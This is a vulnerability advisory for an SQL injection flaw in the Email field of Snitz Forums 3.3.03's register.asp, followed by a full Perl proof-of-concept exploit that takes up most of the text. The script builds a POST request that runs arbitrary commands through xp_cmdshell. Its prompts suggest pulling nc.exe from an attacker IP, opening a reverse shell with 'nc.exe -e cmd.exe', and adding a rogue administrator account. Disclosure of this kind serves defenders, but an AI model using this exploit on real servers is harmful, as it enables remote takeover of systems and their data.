snitz_exec.txt

`Overview:   
Snitz Forums 2000, one of the best ASP based bulletin board systems on  
the market. Getting better every day! A complete board system (forum)  
that allows the user access to a friendly and intuitive interface.  
http://forum.snitz.com   
  
Problem Description:   
Snitz Forums 3.3.03 has an SQL injection vulnerability in its "register.asp"  
page with its "Email" variable. Because "register.asp" doesn't check  
user input, remote users can execute stored procedures (such as "xp_cmdshell")  
to arbitrarily run non-interactive commands on the system.   
  
Vendor Notification:   
Vendor notified last month. This is a deprecated version and users should  
upgrade immediately.   
  
Versions Affected:   
3.3.03   
Most likely earlier versions (not tested)   
  
Fix:   
Upgrade to 3.4.03, the latest version.   
  
Exploit:   
See attached proof-of-concept Perl exploit.   
#!/usr/bin/perl  
  
use Socket;  
  
print "\nRemote command execution against Snitz Forums 3.3.03 (and probably others).\n";  
print "You accept full responsibility for your actions by using this script.\n";  
print "INTERNAL USE ONLY!! DO NOT DISTRIBUTE!!\n";  
  
print "\nWeb server? [www.enterthegame.com]: ";  
my $webserver = <STDIN>;  
chomp $webserver;  
if( $webserver eq "" )  
{  
$webserver = "www.enterthegame.com";  
}  
  
print "\nWeb server port? [80]: ";  
my $port = <STDIN>;  
chomp $port;  
if( $port eq "" )  
{  
$port = 80;  
}  
  
print "\nAbsolute path to \"register.asp\"? [/forum/register.asp]: ";  
my $path = <STDIN>;  
chomp $path;  
if( $path eq "" )  
{  
$path = "/forum/register.asp";  
}  
  
print "\nCommand to execute non-interactively\n";  
print " Example commands: tftp -i Your.IP.Here GET nc.exe\n";  
print " nc.exe -e cmd.exe Your.IP.Here YourNetcatListeningPortHere\n";  
print " or: net user h4x0r /add | net localgroup Administrators h4x0r /add\n";  
print "Your command: ";  
my $command = <STDIN>;  
chomp $command;  
$command =~ s/\ /\%20/g;  
  
if( open_TCP( FILEHANDLE, $webserver, 80 ) == undef )  
{  
print "Error connecting to $webserver\n";  
exit( 0 );  
}  
else  
{  
my $data1 = $path . "\?mode\=DoIt";  
my $data2 = "Email\=\'\%20exec\%20master..xp_cmdshell\%20\'" . $command. "\'\%20--\&Name\=snitz";  
my $length = length( $data2 );  
  
print FILEHANDLE "POST $data1 HTTP/1.1\n";  
if( $port == 80 )  
{  
print FILEHANDLE "Host: $webserver\n";  
}  
else  
{  
print FILEHANDLE "Host: $webserver:$port\n";  
}  
print FILEHANDLE "Accept: */*\n";  
print FILEHANDLE "User-Agent: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\n";  
print FILEHANDLE "Keep-Alive: 300\n";  
print FILEHANDLE "Referer: http:\/\/$webserver$path\?mode\=Register\n";  
print FILEHANDLE "Content-Type: application/x-www-form-urlencoded\n";  
print FILEHANDLE "Content-Length: $length\n\n";  
print FILEHANDLE "$data2";  
  
print "\nSQL injection command sent. If you are waiting for a shell on your listening\n";  
print "netcat, hit \"enter\" a couple of times to be safe.\n\n";  
  
close( FILEHANDLE );  
}  
  
sub open_TCP  
{  
my( $FS, $dest, $port ) = @_;  
  
my $proto = getprotobyname( 'tcp' );  
socket( $FS, PF_INET, SOCK_STREAM, $proto );  
my $sin = sockaddr_in( $port, inet_aton( $dest ));  
connect( $FS, $sin ) || return undef;  
  
my $old_fh = select( $FS );  
$| = 1;  
select( $old_fh );  
return 1;  
}  
`